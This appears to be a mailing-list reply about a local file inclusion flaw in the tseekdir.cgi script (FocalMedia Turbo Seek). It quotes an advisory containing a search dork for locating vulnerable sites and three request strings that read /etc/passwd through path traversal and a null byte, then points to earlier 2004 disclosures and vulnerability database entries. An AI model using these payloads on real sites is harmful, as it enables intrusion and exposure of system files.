Re: tseekdir.cgi<--Local File Include
: ----------------------------------
: foud by: BoNy-m
: Site: http://www.alshmokh.com
: E-mail: BoNy-m@xxxxxxxxxxx
: ----------------------------------
:
: Search:
: allinurl:tseekdir.cgi
:
: example:
: /tseekdir.cgi?location=/etc/passwd%00
: /tseekdir.cgi?id=1055&location=/etc/passwd%00
: /tseekdir.cgi?location=/../../../../etc/passwd%00
This appears to be FocalMedia.Net Turbo Seek for the vendor, and this was
disclosed almost verbatim Sep 12, 2004.
http://osvdb.org/9900
* Nessus Script ID: 14719
* Bugtraq ID: 11163
* Vendor Specific Solution URL: http://www.focalmedia.net/tbdownload.html
* Secunia Advisory ID: 12500
* Vendor URL: http://www.focalmedia.net/index_tb.html
* Other Advisory URL: http://lwb57.webmen.ru/advisories/text/adv17.txt
* Security Tracker: 1011221